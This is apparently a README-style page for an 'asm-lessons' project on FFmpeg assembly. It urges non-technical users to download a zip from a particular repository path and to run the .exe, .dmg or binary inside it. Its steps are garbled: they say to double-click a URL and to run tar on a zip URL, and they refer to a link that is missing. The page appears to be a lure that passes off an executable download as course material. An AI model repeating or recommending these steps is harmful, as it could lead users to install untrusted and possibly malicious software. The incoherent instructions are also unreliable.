Welcome to the asm-lessons project! This guide will help you download and run our lessons on FFmpeg using assembly language. No technical skills are required. Just follow these steps.

Here, you will find various versions of the application. Choose the latest release for the best experience.
- Click on the link above to go to the Releases page.
- Look for the most recent version. The version will be listed with a tag like
v1.0.0. - Under the release notes, find the file labeled with your operating system:
- For Windows users, look for

- The download will begin automatically.
After the download finishes, locate the file:

- Mac: Open your Downloads or Applications folder.
- Linux: Look in your home folder or the directory specified for your downloads.
Now that you have downloaded the file, let’s run it:
- Navigate to the folder where the
.exefile is located. - Double-click on
https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip. - Follow the on-screen prompts to install.
- Double-click the downloaded
.dmgfile. - Drag the
asm-lessonsicon to your Applications folder. - Open your Applications folder and double-click on
asm-lessons.
- Extract the contents of the
https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zipfile using a command liketar -xvzf https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip. - Navigate to the extracted folder in your terminal.
- Run the application with the command
./asm-lessons.
